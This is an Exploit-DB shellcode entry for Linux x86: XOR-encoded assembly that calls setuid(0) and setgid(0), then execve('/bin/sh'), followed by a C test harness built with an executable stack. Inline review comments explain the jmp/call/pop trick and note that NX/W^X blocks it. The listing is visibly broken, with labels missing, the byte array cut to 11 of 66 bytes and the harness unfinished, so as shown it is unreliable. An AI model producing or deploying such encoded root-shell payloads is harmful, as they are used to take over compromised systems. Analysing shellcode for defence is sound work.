
Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)

EDB-ID: 42177
Author: nullparasite
Published: 2017-06-15
Type: Shellcode
Platform: Lin_x86
Shellcode Size: 66 bytes

 ;Author: nullparasite 
;Contact: nullparasite@protonmail.ch
;Category: Shellcode
;Architecture: Linux x86
;Description: This shellcode first sets the uid and gid to zero, then starts a shell via execve. The string /bin/sh is stored XOR-encoded and decoded at run time.
;Tested on: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux


global _start

section .text
; NOTE(review): the jmp/jnz/call below reference the labels entrypoint, decode
; and prepare, but no label lines survive in this listing (presumably lost in
; extraction); as shown, the file will not assemble until they are restored.
; Layout as the references imply: the jmp goes to the call near the bottom,
; the call pushes the address of the db string and lands at pop esi -- the
; jmp/call/pop pattern for locating data without knowing its absolute address.
; Register roles: esi = string base; eax = syscall number / return value;
; ebx, ecx, edx = syscall arguments; cl = decode loop counter.
; Mitigation note: the decode loop writes into the executing region, so the
; sample only runs where its buffer is both writable and executable (NX / W^X
; stops it -- hence -z execstack in the test harness below); the setuid(0),
; setgid(0), execve syscall triplet is the observable behaviour.

jmp entrypoint ; jump to the call at the bottom; its return address is the string

pop esi ; esi = address of the 16-byte blob pushed by "call prepare"
xor eax, eax ; eax = 0
xor ecx, ecx ; ecx = 0
mov BYTE [esi+7], al ; str[7] = 0: NUL-terminate the 7-byte string (overwrites the first '#')
lea ebx, [esi] ; ebx = esi, the string address (becomes argv[0])
mov DWORD [esi + 8], ebx ; bytes 8..11 (were '#') := pointer to the string -> argv[0]
mov DWORD [esi + 12], eax ; bytes 12..15 := 0 -> argv[1] = NULL; also reused as envp below

mov BYTE cl, 7 ; cl = 7, number of encoded bytes

xor BYTE [esi + ecx - 1], 0x3 ; s[cl-1] ^= 3: decode in place (self-modifying, needs W+X memory)
sub cl, 1 ; counter--
jnz decode ; loop over bytes 6..0 (the "decode" label is missing from this listing)

xor ebx, ebx ; ebx = 0 (uid argument)
mov al, 0x17 ; eax = 0x17 = setuid on i386 (eax was zeroed above)
int 0x80 ; setuid(0)

xor ebx, ebx ; ebx = 0 (gid argument)
mov al, 0x2e ; eax = 0x2e = setgid on i386; only al is written, so this assumes the previous syscall left eax = 0
int 0x80 ; setgid(0)

mov BYTE al, 0x0b ; eax = 0x0b = execve on i386; same assumption about eax's upper bytes as above
mov ebx, esi ; filename = decoded "/bin/sh"
lea ecx, [esi + 8] ; argv = { esi, NULL }, built above
lea edx, [esi + 12] ; envp = { NULL }

int 0x80 ; execve("/bin/sh", argv, envp); returns only on failure

call prepare ; pushes the address of the string below; presumably "prepare" labels pop esi above
db ',ajm,pk#########' ; 7 XOR-3 encoded bytes ("/bin/sh") + 9 filler bytes overwritten above with NUL, argv[0] and NULL


# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing


/* Byte form of the shellcode above. Only the first 11 bytes appear in this
 * listing -- the array looks truncated here; the header states the full
 * sample is 66 bytes. */
unsigned char code[] = "\xeb\x34\x5e\x31\xc0\x31\xc9\x88\x46\x07\x8d"

/* Function-pointer view of the byte array: the harness jumps into `code`,
 * which is why it must be built with -z execstack (see the gcc line above). */
typedef int(*shellcode_t)();

int main(){
shellcode_t ret = (shellcode_t)code;

